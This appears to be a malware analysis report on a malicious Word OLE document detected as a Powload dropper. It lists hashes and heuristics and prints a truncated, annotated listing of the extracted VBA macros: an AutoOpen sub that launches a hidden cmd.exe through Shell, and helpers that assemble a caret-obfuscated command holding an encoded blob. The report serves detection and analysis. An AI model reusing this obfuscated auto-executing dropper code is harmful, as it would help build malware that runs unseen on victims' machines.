Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6349ffaa8b50d88…

MALICIOUS

Office (OLE)

81.8 KB Created: 2018-08-31 09:54:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: 6faf33dcd2aebb8a38e44ee3138db09e SHA-1: 1fca477369ffd062b71df6f1d5dafb2a106c820e SHA-256: e6349ffaa8b50d88fbad3ad09d8363533b30af9eec2fcfef81577daa9be850db
Risk score: 202

Heuristics 6

  • ClamAV: Doc.Dropper.Powload-6667984-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6667984-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA — AutoOpen passes a concatenated command string to Shell with window style `11 - 11` = 0 (vbHide), so the spawned process runs with no visible window as soon as the document is opened with macros enabled.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro — Word runs this Sub automatically when the document is opened with macros enabled; in this sample it is the entry point that assembles the command string and invokes Shell().
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this generic description does not fit this sample — a VBA project was recovered (see OLE_VBA_MACROS and the extracted macros.bas), and the AutoOpen marker found here is the modern VBA `Sub AutoOpen()`; treat this finding as subsumed by OLE_VBA_AUTOOPEN rather than as evidence of a separate WordBasic macro.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into embedded drawing/chart parts; it is not contacted at runtime and should not be treated as a network indicator (IOC). Any real download location would be inside the command string the macro assembles at runtime (see macros.bas), which is only partially visible in the truncated listing below.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10335 bytes
SHA-256: 792a12329b597ab7070a019a90c7b10ff90460a49f16dd3f35041594ffbb544c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZQcjfdlPiQGGEW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' Entry point. Word runs AutoOpen automatically when the document is opened
' with macros enabled; the module attributes above (VB_Base =
' "1Normal.ThisDocument") place this Sub in the ThisDocument module.
' The handler below swallows every runtime error so the junk statements
' that follow can never abort the macro before the Shell call.

On _
Error _
Resume _
Next
' Junk / anti-analysis padding: Hour is invoked as a statement on arithmetic
' over identifiers that are never assigned anywhere visible. No Option Explicit
' is present, so they are implicit Variants (Empty, which coerces to 0 in
' arithmetic): each line either evaluates Hour(0) or raises a suppressed
' runtime error (e.g. division by zero when a divisor variable is Empty).
' None of it affects the payload.
   Hour jlOSlR * 48919 / 11027 * bYDHw
   Hour DjWpHZ / 24781 * cndCjN / YsbTPq
   Hour wVZFDz / GrTvN * izBrjO * NMDAzr
' The payload: a single Shell call. Window style is 11 - 11 = 0 (vbHide), so
' the child process has no visible window. The command string is built from:
'   - KeyString(2 + 12 + 1 + 1 + 51) = KeyString(67): Word's key-name lookup,
'     presumably "c" for key code 67 (C) -- TODO confirm in a sandbox;
'   - the return values of helper functions, in this order. oJFiilVFEm,
'     dGWaSUBwzOM and PavwLwjUbZ are defined below and build caret-obfuscated
'     fragments such as "md /V^:^ON/C" (so KeyString + "md" -> "cmd");
'     VJZDDMP, iIYYJrHnnD, hQYtzBW, ohMdzn, bYCiRbLK and lVOthXsjZzS are not
'     visible in this excerpt -- presumably further string-building functions
'     in the truncated part of the module; verify against the full decoded
'     source before asserting what the final command line is.
Shell KeyString(2 + 12 + 1 + 1 + 51) + VJZDDMP + iIYYJrHnnD + oJFiilVFEm + dGWaSUBwzOM + PavwLwjUbZ + hQYtzBW + ohMdzn + bYCiRbLK + lVOthXsjZzS, 11 - 11
' More junk padding (same pattern as above).
   Hour RjnRhv / JCMwu
   Hour VllEo / BWDKQJ / uGiuoK * lBdJdO
End Sub



Attribute VB_Name = "jJPwzAXun"
Function oJFiilVFEm()
' String-building helper: returns the first readable fragment of the command
' line that AutoOpen passes to Shell. Takes no parameters; the result is the
' six local pieces below concatenated in declaration order.
' Every literal is chopped into short chunks and sprinkled with "^", the
' cmd.exe escape character, so that neither the VBA source nor the final
' process command line contains contiguous keywords for a signature to match.
' Once cmd.exe has parsed its /C argument the carets are dropped, and the
' interleaved junk statements are the same Hour-on-Empty padding as AutoOpen.

On _
Error _
Resume _
Next
' Junk padding: Hour(0) or a suppressed runtime error (division by zero /
' overflow); no effect on the return value.
Hour 89224 / uaVui / zYvoLR / PZYFf
   Hour wFJFWi / Gzptpi / 43047 / iqKZv
   Hour cwYRK / 87399 / KawTG / 4025
   Hour iAnTi / RzBWEB
' Chr(4 + 4 + 0 + 2 + 24) = Chr(34) = a double quote. With the carets removed
' this piece reads approximately: md /V:ON/C"set 2zt=AACAgAA
' "md" completes the "cmd" started by KeyString in AutoOpen; /V:ON turns on
' delayed (!var!) environment-variable expansion; /C "set 2zt=..." begins
' storing an encoded blob in an environment variable. The stage that decodes
' and executes that blob is in later fragments not shown in this truncated
' listing -- do not infer the downloader behaviour from this function alone.
NipnISwL = "md /V" + "^:^ON" + "/C" + Chr(4 + 4 + 0 + 2 + 24) + "^se" + "^" + "t ^2" + "^zt=A" + "^AC" + "A^g^A" + "A^"
Hour fDCJnS / wEiVJT
   Hour TPDtuw * EjlJp
   Hour 92994 / 39376 / 10409 * 30589
   Hour uYRME / KAWuG * 85111 / 99099
' Pieces 2-6: continuation of the encoded blob assigned to the variable above
' (same caret obfuscation; the exact bytes only matter once the decoder stage
' is recovered).
UsIhVW = "IA" + "^ACAg" + "A^A^IAA" + "C^A" + "^gA" + "A"
Hour oXSWN * Dzrjv * 59628 * ctJwI
   Hour CGphS / Mdjrqz
   Hour 56161 * UjXbc / DRDXzm / pLNLkQ
zwJzL = "IA^AC" + "Ag" + "A^A" + "I^A" + "AC^A^g^" + "A" + "^A"
Hour 3868 * LWbhMj / YpqBU * zsqTj
   Hour owzzvr / 77214 * iAhntH * VUtXL
   Hour lrVNj * RaliG
   Hour lEkpaP * svpjKY
   Hour 48756 * oRzpmJ / ploYi * PYOkmv
   Hour mZnSKb / GRQio * 57878 * zPsvbj
LMDGwRpNTX = "I^" + "AA" + "CA^gAQf" + "^A0H^A" + "^7^B" + "^A^a" + "A^M" + "G^A"
Hour 3722 * 59512
   Hour rSivO * uTDPZ
   Hour 73741 * vdtpI / aRvWW * 49352
dzYVJtNYiQ = "^0BQ^Y" + "^A^M^GA" + "9B^w^O^" + "AsG^Ah" + "^B" + "Q^ZAI^H" + "Ai^B^wO" + "A"
Hour auSmjA * IjlKt * EowrH / QHTMW
   Hour ZXLYpL * VcVGq * UaUKE * 95103
   Hour NGaiS / 18068
dRYpclzEz = "cHAM" + "^" + "B^QV" + "^AQ" + "CAg^" + "AQbAU^G" + "^" + "A^0B^Q^" + "SA^0" + "CA" + "^lB^" + "w^aA8^G"
' Return value: the six pieces joined in the order they were built.
oJFiilVFEm = NipnISwL + UsIhVW + zwJzL + LMDGwRpNTX + dzYVJtNYiQ + dRYpclzEz
' Trailing junk padding after the return value is already set.
   Hour hvpwb * zKwziD
   Hour pBEiq / JIZckL * 32316 * uWBrfU
   Hour BEtcX * Hzlzln / 70598 * NbdDwZ
End Function
Function dGWaSUBwzOM()
' String-building helper: returns the fragment of the Shell command line that
' follows oJFiilVFEm's output in AutoOpen. Takes no parameters; the result is
' the eight local pieces below concatenated in declaration order.
' The content appears to be a continuation of the caret-obfuscated encoded
' blob that oJFiilVFEm starts assigning with "set 2zt=" -- no cmd keywords are
' visible in this function, only blob characters interleaved with "^" escape
' characters that cmd.exe strips at parse time. Junk Hour statements between
' the assignments are the same padding pattern as in AutoOpen.

On _
Error _
Resume _
Next
' Junk padding: Hour(0) or a suppressed runtime error; no effect on the result.
Hour PjLQZ * rYGfiA * oOPJAb / madBRI
   Hour bWNoo / ivMjiz
   Hour 47835 / IGcOmP / pZuVbo / 7308
' Pieces 1-8: blob continuation (exact bytes matter only once the decoder
' stage, which is outside this truncated listing, is recovered).
BdFUcvNXT = "^A^2" + "^B^gbA" + "k" + "^E^" + "A7AQK^A" + "c^H^" + "A^M" + "B^QV^" + "A" + "^QCAg" + "^" + "AAL^AI^" + "GA^"
Hour XdzkR * LIKSDZ
   Hour 53573 / NvVuou / 76830 / mhotTP
   Hour cRbuq / QFcwl
   Hour 83699 * 3719
ivjamdCuPn = "yBgYA^" + "QC^A" + "oAQ^Z" + "A" + "w^GA^" + "p" + "^B" + "^gRAQG" + "A" + "hB^w^b" + "A^"
Hour 36760 / NtiPJ
   Hour iLDcvs / 87617
   Hour 52261 / oAzim
hSqUS = "w^G^" + "AuB^w" + "dA^8G" + "AE" + "B" + "^" + "g^L" + "^A^"
Hour YpLCAR * auBvIm / 53644 * snQrNW
   Hour GVkbF * tbtDm / 71982 / XbKluU
   Hour ZSPMFH * 83435
LaHukWBQiD = "Y^FA^xB" + "^wS" + "AQC^A^7" + "B" + "^Q^eA^I" + "H^A^0"
Hour 33740 / zdFhQ * 79461 * HBZCFz
   Hour 28680 * LFFSB
   Hour XNQVq * fQDzFX
   Hour 37737 / CVPALC * kmjmD / utwSN
XCSoasurO = "^BweAk" + "CAmB^w" + "b^A^" + "E^E" + "^Ak^A^A" + "I^A4G^A" + "p" + "^BA^" + "I" + "^A^IG" + "A^y^"
Hour 58314 / ZbvwUR
   Hour ELBRM * zofBJ / 80477 * uJZXp
   Hour 33977 / 95407 / FuwRik / DuzRr
   Hour 75121 / OtuPzX
PvcWDA = "B^g" + "Y^AQCA" + "^o^AAa" + "A" + "M^G" + "Ah" + "^BQ"
Hour qfSWbf / fspSHB
   Hour IWiDEv * cfoJl / 75503 * 76072
TVYfC = "Z^AIHAv" + "^B^gZA" + "sDAnA^" + "Q^" + "ZAgHAl" + "^B" + "^g^L" + "A" + "cC" + "^ArAgU"
Hour hbGrYv * SVOEc / dLoHq * JFJsiC
   Hour 66262 / tzsjR / 66232 * aIujb
hkfzYKQXf = "A^YEAWB" + "A" + "^J^A^sC" + "^An" + "AAX^Ac" + "C^Ar"
' Return value: the eight pieces joined in the order they were built.
dGWaSUBwzOM = BdFUcvNXT + ivjamdCuPn + hSqUS + LaHukWBQiD + XCSoasurO + PvcWDA + TVYfC + hkfzYKQXf
' Trailing junk padding after the return value is already set.
   Hour hDATKz / 93725
   Hour 93755 / NfXiX / mMEYXW / KdDlj
End Function
Function PavwLwjUbZ()

On _
Error _
Resume _
Next
Hour 37551 / UaLfCT
   Hour zRvUE / 6
... (truncated)